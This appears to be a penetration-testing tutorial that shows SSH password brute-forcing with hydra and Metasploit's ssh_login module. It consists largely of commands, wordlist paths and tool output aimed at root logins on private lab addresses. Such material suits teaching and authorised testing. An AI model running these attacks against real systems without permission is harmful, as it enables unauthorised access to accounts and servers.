Crack the password over the internet
Sometimes, if the target doesn't expose any password hashes or vulnerabilities, we can fall back to a brute-force attack to guess the password itself.
It is a last resort, since it generates a large amount of traffic and noise on the target.
Tools
- Password dictionary: in Kali, search with "wordlist" as a keyword (locate wordlist) to find the bundled password lists. You can also download one from the internet, or build one yourself.
- Password cracker: Burp, Metasploit, hydra. A lot of tools can do this.
Example - cracking SSH
Locate a wordlist and pick one, or build your own. It's up to you.
root@kali:~# locate wordlist | head -n 20
/usr/bin/wordlists
/usr/sbin/remove-default-wordlist
/usr/sbin/select-default-wordlist
/usr/sbin/update-default-wordlist
/usr/share/wordlists
/usr/share/applications/kali-wordlists.desktop
/usr/share/dict/README.select-wordlist
/usr/share/dict/wordlist-top4800-probable.txt
/usr/share/dirb/wordlists
/usr/share/dirb/wordlists/big.txt
/usr/share/dirb/wordlists/catala.txt
/usr/share/dirb/wordlists/common.txt
/usr/share/dirb/wordlists/euskera.txt
/usr/share/dirb/wordlists/extensions_common.txt
/usr/share/dirb/wordlists/indexes.txt
/usr/share/dirb/wordlists/mutations_common.txt
/usr/share/dirb/wordlists/others
/usr/share/dirb/wordlists/small.txt
/usr/share/dirb/wordlists/spanish.txt
/usr/share/dirb/wordlists/stress
...
Hydra
root@kali:~# hydra -h
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-q do not print messages about connection errors
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql
nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
Start cracking it
root@kali:~# locate wordlist | grep password | head -n 20
/usr/share/metasploit-framework/data/wordlists/hci_oracle_passwords.csv
/usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt
/usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv
/usr/share/metasploit-framework/data/wordlists/password.lst
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
/usr/share/metasploit-framework/data/wordlists/vnc_passwords.txt
root@kali:~# wc -l /usr/share/metasploit-framework/data/wordlists/password.lst
88397 /usr/share/metasploit-framework/data/wordlists/password.lst
root@kali:~# hydra -v -l root -P /usr/share/metasploit-framework/data/wordlists/password.lst -t 1 192.168.56.103 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-04 23:54:14
[DATA] max 1 task per 1 server, overall 1 task, 88397 login tries (l:1/p:88397), ~88397 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@192.168.56.103:22
[INFO] Successful, password authentication is supported by ssh://192.168.56.103:22
Now just wait for it; cracking takes time.
Hydra shows the results when it finishes.
Metasploit
> msfconsole
msf5 > search ssh
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/windows/ssh/sysax_sshd_kexchange 2013-03-17 normal No Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
1 auxiliary/fuzzers/ssh/ssh_kexinit_corrupt normal No SSH Key Exchange Init Corruption
2 auxiliary/fuzzers/ssh/ssh_version_15 normal No SSH 1.5 Version Fuzzer
3 auxiliary/fuzzers/ssh/ssh_version_2 normal No SSH 2.0 Version Fuzzer
4 auxiliary/fuzzers/ssh/ssh_version_corrupt normal No SSH Version Corruption
5 auxiliary/scanner/http/cisco_firepower_login normal Yes Cisco Firepower Management Console 6.0 Login
6 auxiliary/scanner/http/gitlab_user_enum 2014-11-21 normal Yes GitLab User Enumeration
7 auxiliary/scanner/ssh/apache_karaf_command_execution 2016-02-09 normal Yes Apache Karaf Default Credentials Command Execution
8 auxiliary/scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal Yes Cerberus FTP Server SFTP Username Enumeration
9 auxiliary/scanner/ssh/detect_kippo normal Yes Kippo SSH Honeypot Detector
10 auxiliary/scanner/ssh/eaton_xpert_backdoor 2018-07-18 normal Yes Eaton Xpert Meter SSH Private Key Exposure Scanner
11 auxiliary/scanner/ssh/fortinet_backdoor 2016-01-09 normal Yes Fortinet SSH Backdoor Scanner
12 auxiliary/scanner/ssh/juniper_backdoor 2015-12-20 normal Yes Juniper SSH Backdoor Scanner
13 auxiliary/scanner/ssh/karaf_login normal Yes Apache Karaf Login Utility
14 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal Yes libssh Authentication Bypass Scanner
15 auxiliary/scanner/ssh/ssh_enumusers normal Yes SSH Username Enumeration
16 auxiliary/scanner/ssh/ssh_identify_pubkeys normal Yes SSH Public Key Acceptance Scanner
17 auxiliary/scanner/ssh/ssh_login normal Yes SSH Login Check Scanner
18 auxiliary/scanner/ssh/ssh_login_pubkey normal Yes SSH Public Key Login Scanner
19 auxiliary/scanner/ssh/ssh_version normal Yes SSH Version Scanner
....
> use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/password.lst
pass_file => /usr/share/metasploit-framework/data/wordlists/password.lst
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.56.101
rhosts => 192.168.56.101
msf5 auxiliary(scanner/ssh/ssh_login) > set username root
username => root
msf5 auxiliary(scanner/ssh/ssh_login) > exploit
Just like that.
The scan runs from there.
Another tip for pwning: DON'T WASTE YOUR TIME WHILE BRUTE FORCING.
While it runs, try other things: do more recon, look for vulnerable endpoints.
Try more.